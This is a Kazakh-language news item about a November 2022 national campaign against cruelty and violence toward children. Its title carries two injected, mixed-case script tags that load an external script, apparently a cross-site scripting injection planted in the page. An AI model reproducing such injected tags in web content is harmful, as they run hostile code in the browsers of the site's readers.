Қатыгездік пен зорлық-зомбылықсыз балалық шақ<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

11.11.2022

Қазақстанда БҰҰ-ның Бала құқықтары туралы конвенциясын ратификациялау аясында 8-20 қараша аралығында "Қатыгездік пен зорлық-зомбылықсыз балалық шақ" республикалық ақпараттық науқаны өтеді. Науқанның мақсаты-ерессектер мен балаларды қоса алғанда, қоғамның балаларға қатысты зорлық-зомбылық пен  қатыгездік проблемасы, оның бала мен қоғам үшін салдары, сондай-ақ осы саладағы халықаралық  заңнаманың негіздері туралы  хабардар болуын арттыру. Акция аясында республика өңірлерінде баспасөз конференцияларын, онлайн-семинарлар, ҮЕҰ өкілдерімен сараптамалық кездесулер, мектептердегі сынып сағаттары, рейдтік іс-шаралар және т.б. өткізіледі. Республикалық және жергілікті телеарналарда бейнесюжеттер көрсету жоспарлануда, зорлық-зомбылық және  қатыгез қарым-қатынас мәселелері бойынша парақшалар, буклеттер, плакаттар таратылады. Бұл науқанға ата-аналар, балалар, жастар, мүдделі мемлекеттік құрылымдардың өкілдері, зорлық-зомбылық пен зорлық-зомбылықтың құрбаны болған балалар мен жасөспірімдерге көмек көрсететін, сондай-ақ  өмірде қиын жағдайға тап болған қолдау көрсетумен айналысатын қоғамдық және үкіметтік емес ұйымдар, бұқаралық ақпарат құралдары қатысады. 

Просмотров: 224


Пікір қосу



Деректерді қолтаңбаға қосу